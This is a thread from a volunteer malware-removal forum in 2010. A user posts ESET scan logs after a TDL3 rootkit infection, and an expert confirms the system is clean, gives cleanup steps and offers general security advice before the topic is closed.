# local_time=2010-09-24 08:18:19 (+0000, GMT Daylight Time)
# country="United Kingdom"
# lang=1033
# osver=5.1.2600 NT Service Pack 3
# compatibility_mode=512 16777215 100 0 220003 220003 0 0
# compatibility_mode=5121 16777189 100 75 364095 14570923 0 0
# compatibility_mode=8192 67108863 100 0 27394 27394 0 0
# scanned=468
# found=1
# cleaned=0
# scan_time=302
C:\Documents and Settings\All Users\Application Data\AOL Downloads\triton_uk\6.1.17.1\setup.exe probably a variant of Win32/Agent.HZHBURL trojan 00000000000000000000000000000000 I
esets_scanner_update returned -1 esets_gle=53251
# version=7
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.6211
# api_version=3.0.2
# EOSSerial=ece37a970719ac46951bea47476c6aad
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=true
# antistealth_checked=true
# utc_time=2010-09-24 10:29:38
# local_time=2010-09-24 11:29:38 (+0000, GMT Daylight Time)
# country="United Kingdom"
# lang=2057
# osver=5.1.2600 NT Service Pack 3
# compatibility_mode=512 16777215 100 0 220357 220357 0 0
# compatibility_mode=5121 16777189 100 75 364449 14571277 0 0
# compatibility_mode=8192 67108863 100 0 27748 27748 0 0
# scanned=195593
# found=5
# cleaned=0
# scan_time=11424
C:\Documents and Settings\All Users\Application Data\AOL Downloads\triton_uk\6.1.17.1\setup.exe probably a variant of Win32/Agent.HZHBURL trojan 00000000000000000000000000000000 I
C:\Qoobox\Quarantine\C\Documents and Settings\HP_Owner\cleanmgr.exe.vir a variant of Win32/Kryptik.GVN trojan 00000000000000000000000000000000 I
C:\Qoobox\Quarantine\C\WINDOWS\system32\termsrv.dll.vir Win32/Spy.Ursnif.A virus 00000000000000000000000000000000 I
C:\System Volume Information\_restore{80DC5C79-2A86-4CC1-9CD1-1BF7D6883F58}\RP1209\A0213023.exe Win32/Spy.Zbot.ZR trojan 00000000000000000000000000000000 I
C:\System Volume Information\_restore{80DC5C79-2A86-4CC1-9CD1-1BF7D6883F58}\RP1214\A0226391.dll Win32/Spy.Ursnif.A virus 00000000000000000000000000000000 I
ZxcvB123
Regular Member
 
Posts: 16
Joined: September 20th, 2010, 1:06 pm

Re: Help re: Browser Redirects & Raptr Install...

Unread postby melboy » September 24th, 2010, 3:20 pm

Hi

Your log now appears to be clean.


Those detections by ESET were expected, they are files already quarantined by combofix and System Restore entries. System Restore will be reset by following the instructions below.

The setup.exe file is AOL instant messaging software (Aim 6), and a false positive.

To answer a couple of earlier questions, I wouldn't restart Spybot S&D's TeaTimer, though you might find it's immunize feature usefull if you don't already use it. Mcafee and MBAM's realtime protection should suffice with a couple of additions as mentioned further down the page.
No amount of security will protect you totally when using P2P filesharing and/or dabbling in cracks/keygens etc. There are always going to be some infections that slip through the net. It also helps to make sure you keep the OS and 3rd party software updated. Having older, exploitable versions of Java won't have helped you.

As well as the rootkit that was causing you problems, the malware you referred to in your first post that you removed with MBAM prior to coming here, is known to attempt to steal passwords for a multitude of online activities (online banking information being one of them). It's important you change them.


=================


Right, that said -This is my general post for when your logs show no more signs of malware - Please let me know if you still are having problems with your computer and what these problems are. If not, please continue with the instructions below.


Uninstall Combofix
We Need to Remove ComboFix
  1. Please go to Start -> Run
  2. Enter "ComboFix /uninstall" (without quotes). Note the space between "ComboFix" and "/uninstall", it needs to be there.
    Image
  3. Press OK (Or hit enter).
  4. Allow ComboFix to remove itself.



OTC by OldTimer

Download OTC by Old Timer and save it to your Desktop.

  • Double-click OTC.exe
  • Click the CleanUp! button
  • Select Yes when the Begin cleanup Process? Prompt appears
  • If you are prompted to Reboot during the cleanup, select Yes
  • The tool will delete itself once it finishes, if not delete it by yourself

You can also delete RKUnhooker and any associated logfiles.


=============================================

Your computer was infected with a ROOTKIT. In particular, the TDL3 rootkit, also known as Win32/Alureon. A rootkit is a set of software tools intended for concealing running processes, files or system data from the operating system.

Due to its rootkit functionality, it's impossible to tell what may have been done when the system was compromised.

Therefore it may be prudent to:

  1. Call all your banks, financial institutions, credit card companies and inform them that you may be a victim of identity theft and put a watch on your accounts.
  2. Change all your passwords (ISP login password, your email address(es) passwords, financial accounts, PayPal, eBay, Amazon, online groups and forums and any other online activities you carry out which require a username and password)

Windows Rootkits

How do I respond to a possible identity theft and how do I prevent it

==============================================


General Security and Computer Health
Below are some steps to follow in order to dramatically lower the chances of reinfection. You may have already implemented some of the steps below, however you should follow any steps that you have not already implemented.

  • Make sure that you keep your antivirus updated
    New viruses come out every minute, so it is essential that you have the latest signatures for your antivirus program to provide you with the best possible protection from malicious software.
    Note: You should only have one antivirus installed at a time. Having more than one antivirus program installed at once is likely to cause conflicts and may well decrease your overall protection as well as impairing the performance of your PC.
    Uninstall Tools for Major Antivirus Products

  • Security Updates for Windows, Internet Explorer & Microsoft Office
    Whenever a security problem in its software is found, Microsoft will usually create a patch so that after the patch is installed, attackers can't use the vulnerability to install malicious software on your PC. Keeping up with these patches will help to prevent malicious software being installed on your PC. Ensure you are registered for Windows updates via Start > right-click on My Computer > Properties > Automatic Updates tab or visit the Microsoft Update site on a regular basis.
    Note: The update process uses ActiveX, so you will need to use internet explorer for it and allow the ActiveX control to install.

  • Update Non-Microsoft Programs
    Microsoft isn't the only company whose products can contain security vulnerabilities. To check whether other programs running on your PC are in need of an update, you can use the Secunia Software Inspector - I suggest that you run it at least once a month.


Recommended Programs

I would recommend the download and installation of some or all of the following programs (if not already present), and the updating of them on a regular basis.

  • WinPatrol
    As a robust security monitor, WinPatrol will alert you to hijackings, malware attacks and critical changes made to your computer without your permission. WinPatrol takes snapshot of your critical system resources and alerts you to any changes that may occur without your knowledge. For more information, please visit HERE.
  • Hosts File
    If you use the immunize feature with Spybot S&D for added protection you may also like to add further host file entries. A simple explanation of what a Hosts file does is HERE and for more information regarding host files read HERE.


Finally I am trying to make one point very clear. It is absolutely essential to keep all of your security programs up to date.

Also please read this great article by Tony Klein So How Did I Get Infected In First Place

I'd be grateful if you could reply to this post so that I know you have read it and, if you've no other questions, the thread can be closed.

Happy surfing and stay clean!
User avatar
melboy
MRU Expert
MRU Expert
 
Posts: 3670
Joined: July 25th, 2008, 4:25 pm
Location: UK

Re: Help re: Browser Redirects & Raptr Install...

Unread postby ZxcvB123 » September 24th, 2010, 3:27 pm

Excellent Work Melboy....
Thanks so much for you help and perseverance.
May the force be with you.

Thanks...
ZxcvB123
Regular Member
 
Posts: 16
Joined: September 20th, 2010, 1:06 pm

Re: Help re: Browser Redirects & Raptr Install...

Unread postby melboy » September 24th, 2010, 3:28 pm

You're welcome. :)
User avatar
melboy
MRU Expert
MRU Expert
 
Posts: 3670
Joined: July 25th, 2008, 4:25 pm
Location: UK

Re: Help re: Browser Redirects & Raptr Install...

Unread postby Gary R » September 24th, 2010, 5:08 pm

As your problems appear to have been resolved, this topic is now closed.

We are pleased we could help you resolve your computer's malware issues.

If you would like to make a comment or leave a compliment regarding the help you have received, please see Feedback for Our Helpers - Say "Thanks" Here.
User avatar
Gary R
Administrator
Administrator
 
Posts: 25888
Joined: June 28th, 2005, 11:36 am
Location: Yorkshire
Advertisement
Register to Remove

Previous

  • Similar Topics
    Replies
    Views
    Last post

Return to Infected? Virus, malware, adware, ransomware, oh my!



Who is online

Users browsing this forum: No registered users and 277 guests

Contact us:

Advertisements do not imply our endorsement of that product or service. Register to remove all ads. The forum is run by volunteers who donate their time and expertise. We make every attempt to ensure that the help and advice posted is accurate and will not cause harm to your computer. However, we do not guarantee that they are accurate and they are to be used at your own risk. All trademarks are the property of their respective owners.

Member site: UNITE Against Malware